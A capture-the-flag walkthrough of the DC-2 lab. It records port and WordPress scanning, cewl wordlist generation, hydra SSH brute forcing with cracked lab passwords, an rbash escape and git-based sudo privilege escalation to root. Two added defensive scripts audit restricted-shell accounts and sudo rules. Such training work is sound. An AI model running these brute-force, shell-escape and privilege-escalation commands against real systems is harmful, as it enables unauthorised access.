DC-2 Lab Penetration Walkthrough (Very Detailed)

An nmap scan identified the IP address of the DC-2 target, which runs Apache and OpenSSH. wpscan identified WordPress 4.7.10, with potential risks such as XML-RPC and external WP-Cron being enabled. Three users were detected: admin, jerry and tom. A password list generated with cewl was used to brute-force SSH, yielding a login as tom. Privileges were then escalated to root through sudo rights on the git command, and the final flag was found.
(Summary generated automatically by CSDN.)

Target machine page

Information gathering

  • Obtaining DC-2's IP address

    Looking up DC-2's MAC address gave 00:0C:29:DF:B1:F2; an nmap scan of my local subnet for live hosts then showed that the IP matching DC-2's MAC address is 192.168.175.149.

  • The target's web page

  • Scanning DC-2's open ports

    ┌──(kali💋kali)-[~]
    └─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.149 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-01 11:49 EDT
    Nmap scan report for dc-2 (192.168.175.149)
    Host is up (0.0017s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
    |_http-generator: WordPress 4.7.10
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: DC-2 – Just another WordPress site
    7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
    |   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
    |   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
    |_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
    MAC Address: 00:0C:29:DF:B1:F2 (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT     ADDRESS
    1   1.68 ms dc-2 (192.168.175.149)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
    Port   State  Service  Version
    80     open   http     Apache httpd 2.4.10 ((Debian))
    7744   open   ssh      OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

  • Web application fingerprint

    OS            Linux 3.X
    Service       Server: Apache/2.4.10 (Debian)
    X-Powered-By  PHP
    CMS           WordPress 4.7.10

  • wpscan scan

    ┌──(kali💋kali)-[~]
    └─$ wpscan --url http://dc-2/ -e vp,u --plugins-detection mixed
    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|

             WordPress Security Scanner by the WPScan Team
                             Version 3.8.18
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________

    [i] It seems like you have not updated the database for some time.
    [?] Do you want to update now? [Y]es [N]o, default: [N]Y
    [i] Updating the Database ...
    [i] Update completed.

    [+] URL: http://dc-2/ [192.168.175.149]
    [+] Started: Sun Apr  2 04:24:42 2023

    Interesting Finding(s):

    [+] Headers
     | Interesting Entry: Server: Apache/2.4.10 (Debian)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%

    [+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

    [+] WordPress readme found: http://dc-2/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%

    [+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299

    [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
     | Found By: Rss Generator (Passive Detection)
     |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
     |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

    [+] WordPress theme in use: twentyseventeen
     | Location: http://dc-2/wp-content/themes/twentyseventeen/
     | Last Updated: 2023-03-29T00:00:00.000Z
     | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
     | [!] The version is out of date, the latest version is 3.2
     | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
     | Style Name: Twenty Seventeen
     | Style URI: https://wordpress.org/themes/twentyseventeen/
     | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
     | Author: the WordPress team
     | Author URI: https://wordpress.org/
     |
     | Found By: Css Style In Homepage (Passive Detection)
     |
     | Version: 1.2 (80% confidence)
     | Found By: Style (Passive Detection)
     |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

    [+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods)
     Checking Known Locations - Time: 00:00:05 <===============================================> (5370 / 5370) 100.00% Time: 00:00:05
    [+] Checking Plugin Versions (via Passive and Aggressive Methods)

    [i] No plugins Found.

    [+] Enumerating Users (via Passive and Aggressive Methods)
     Brute Forcing Author IDs - Time: 00:00:00 <===================================================> (10 / 10) 100.00% Time: 00:00:00

    [i] User(s) Identified:

    [+] admin
     | Found By: Rss Generator (Passive Detection)
     | Confirmed By:
     |  Wp Json Api (Aggressive Detection)
     |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
     |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     |  Login Error Messages (Aggressive Detection)

    [+] jerry
     | Found By: Wp Json Api (Aggressive Detection)
     |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
     | Confirmed By:
     |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     |  Login Error Messages (Aggressive Detection)

    [+] tom
     | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
     | Confirmed By: Login Error Messages (Aggressive Detection)

    [!] No WPScan API Token given, as a result vulnerability data has not been output.
    [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

    [+] Finished: Sun Apr  2 04:24:52 2023
    [+] Requests Done: 5442
    [+] Cached Requests: 6
    [+] Data Sent: 1.349 MB
    [+] Data Received: 20.798 MB
    [+] Memory used: 253.66 MB
    [+] Elapsed time: 00:00:10

    Three users were detected: admin, jerry and tom.

  • Vulnerability scan report

  • Directory scan

    The admin login page is http://dc-2/wp-login.php

  • flag1

    Your usual wordlists probably won't work, so maybe you just need to stay cool.
    More passwords is always better, but sometimes you just can't win them all.
    Log in as one to see the next flag.
    If you can't find it, log in as another.

    The hint implies that the usual brute-force wordlists won't work here, and it also points at cewl, so let's try crawling the site's pages for words.

    The cewl command: cewl is a Ruby application that crawls a given URL to a given depth, optionally following external links, and returns a wordlist that can be passed to other tools for password brute-forcing.
    ┌──(kali💋kali)-[~]
    └─$ cewl http://dc-2 >dc2.dir           # write the collected words into dc2.dir

    ┌──(kali💋kali)-[~]
    └─$ wc -l dc2.dir               # 239 entries collected, candidate passwords for the login
    239 dc2.dir
  • Remote password cracking with hydra

    hydra ssh://192.168.175.149:7744 -L user.dir -P dc2.dir -vV -f -t 64

    This shows that user tom can connect over SSH with the password parturient.

  • Enumerating registered users' passwords with wpscan

    wpscan --url http://dc-2 -U user.dir -P dc2.dir

    This reveals the passwords of tom and jerry:

    Username: jerry, Password: adipiscing
    Username: tom, Password: parturient

  • Logging in to the admin panel

    Logging in as tom turned up no flag; logging in as jerry found it.

    Browsing through the pages, flag2 is found:

    If you can't exploit WordPress and take a shortcut, there is another way.
    Hope you found another entry point.

  • SSH remote connection

    Connecting as jerry fails; connecting as tom reveals flag3.

    flag3:

    Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

    flag3 didn't seem to give anything away, so first check whether any commands carry the SUID bit.

    No luck.

    Going back over flag3, it hints at "su", which suggests sudo privilege escalation.

    First I tried switching to the jerry user and found that su and a number of common commands were unavailable; the current shell was shown as rbash, a restricted shell, so an rbash bypass was worth considering. This was a pain: I got stuck not knowing how to bypass it and referred to this article by an expert.

    There are two ways to bypass rbash; here the export command is used:

    BASH_CMDS[a]=/bin/sh;a       # Note: assign /bin/sh to hash entry a and call it
    export PATH=$PATH:/bin/      # Note: add /bin to the exported PATH
    export PATH=$PATH:/usr/bin   # Note: add /usr/bin to the exported PATH
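    From the defender's side, the lesson of this bypass is that rbash is not a security boundary: its restrictions start only after the startup files have run, anything reachable through PATH executes unrestricted, and only recent bash versions refuse writes to BASH_CMDS in restricted mode. The audit script below is an added example, not part of the original write-up; the bin-directory layout, the list of escape-capable binaries and the fixture home directory are assumptions.

```shell
#!/bin/sh
# Audit of a restricted-shell (rbash) account, written from the defender's
# side. rbash restricts only the shell itself: startup files run before the
# restrictions take effect, and every program reachable through PATH runs
# unrestricted, so one pager, editor or interpreter in the allowed directory
# is a complete escape.

# Names that must not appear in the restricted user's bin directory
# (shells, interpreters, editors, pagers). A deliberately short list.
ESCAPE_BINS='sh bash dash zsh python python3 perl ruby vi vim nano less more man git find awk'

# audit_rbash_account HOME_DIR BIN_DIR: prints one FLAG line per weakness,
# returns 1 if anything was flagged and 0 otherwise.
audit_rbash_account() {
  home=$1; bindir=$2; flagged=0
  for rc in .bash_profile .bash_login .profile .bashrc; do
    f="$home/$rc"; [ -e "$f" ] || continue
    owner=$(ls -ld "$f" | awk '{ print $3 }')
    # Must be root-owned and not group/world-writable, or the user rewrites PATH before rbash starts.
    if [ "$owner" != root ] || [ -n "$(find "$f" \( -perm -020 -o -perm -002 \))" ]; then
      echo "FLAG $f is writable by the restricted user (startup files run before restrictions apply)"
      flagged=1
    fi
  done
  # PATH must point only at the allowed directory and be read-only, otherwise /bin can be appended.
  if ! grep -qs '^readonly PATH' "$home/.bash_profile" "$home/.profile" "$home/.bashrc"; then
    echo "FLAG PATH is not declared readonly in the startup files"
    flagged=1
  fi
  for b in $ESCAPE_BINS; do
    if [ -e "$bindir/$b" ]; then
      echo "FLAG $bindir/$b gives an unrestricted shell"
      flagged=1
    fi
  done
  return $flagged
}

# Constructed fixture (not DC-2's real home directory) so the audit runs offline:
# PATH is exported but not readonly, .bashrc is world-writable and less is allowed.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/bin"
  printf 'PATH=$HOME/bin\nexport PATH\n' > "$d/.bash_profile"
  : > "$d/.bashrc"; chmod 666 "$d/.bashrc"
  : > "$d/bin/ls"; : > "$d/bin/less"
  echo "$d"
}

FIXTURE=$(make_fixture)
if audit_rbash_account "$FIXTURE" "$FIXTURE/bin"; then echo "restricted account looks sane"; fi
```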

    Now the common commands work again; switch user with su jerry, which succeeds, and listing the directory reveals flag4.txt:

    Good to see that you've made it this far, but you're not home yet.
    You still need to get the final flag (the only flag that really matters!!).
    No hints here, you're on your own now. :-)
    Go on, git outta here!!!!

    Checking id and trying to enter the root directory shows that jerry has only ordinary user privileges.

    Running sudo -l to list the commands the current user may run as root shows that /usr/bin/git can be run as root without a password.

    flag4 points at "git", and together with flag3's "su" hint this suggests privilege escalation through git.

  • Privilege escalation through git

    sudo git -p help       # the help system can be reached through any git command (e.g. git branch)
    !/bin/bash
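    The root cause on the defender's side is a sudo rule that grants a command able to launch a pager or editor without the NOEXEC: tag. The script below is an added example, not from the original write-up: it parses constructed sudo -l output (the sample lines and the list of escape-capable binaries are assumptions) and flags such rules.

```shell
#!/bin/sh
# Audit of "sudo -l" output from the defender's side: flag rules that hand a
# user a binary able to open an interactive shell when run as root (pagers,
# editors, and tools such as git that invoke a pager for "help"), unless the
# rule carries the NOEXEC: tag, which makes sudo block the child execve().

# Constructed sample of "sudo -l" output; not captured from DC-2.
SAMPLE_SUDO_L='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) NOPASSWD: NOEXEC: /usr/bin/git
    (root) /usr/bin/apt-get update
    (ALL : ALL) ALL'

# Binaries whose privileged invocation offers a shell escape. A deliberately
# short list chosen for this example.
SHELL_ESCAPE_BINS='git less more man vi vim nano'

# audit_sudo_l: reads sudo -l output on stdin, prints one FLAG line per risky
# rule, returns 1 if anything was flagged and 0 otherwise.
audit_sudo_l() {
  awk -v bins="$SHELL_ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1; flagged = 0 }
    /^[[:space:]]+\(/ {                                   # rule lines start with "(runas)"
      rule = $0; sub(/^[[:space:]]+/, "", rule)
      spec = rule; sub(/^\([^)]*\)[[:space:]]*/, "", spec)  # drop "(root)" or "(ALL : ALL)"
      noexec = (spec ~ /NOEXEC:/)
      gsub(/[A-Z]+:[[:space:]]*/, "", spec)               # drop tags such as NOPASSWD: / NOEXEC:
      m = split(spec, cmds, ",")                           # a rule may list several commands
      for (j = 1; j <= m; j++) {
        cmd = cmds[j]; sub(/^[[:space:]]+/, "", cmd)
        if (cmd == "ALL") { print "FLAG unrestricted sudo: " rule; flagged = 1; continue }
        split(cmd, parts, " "); path = parts[1]           # first word is the program path
        base = path; sub(/.*\//, "", base)
        if ((base in risky) && !noexec) {
          print "FLAG " path " can spawn a shell as root: " rule " (add NOEXEC: or drop the rule)"
          flagged = 1
        }
      }
    }
    END { exit flagged }'
}

# Stand-alone run over the sample; expect two FLAG lines (the NOEXEC rule is clean).
if printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l; then echo "no risky sudo rules"; fi
```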

    Privilege escalation succeeded: root!!!!

    View the final flag.

Author: tacokings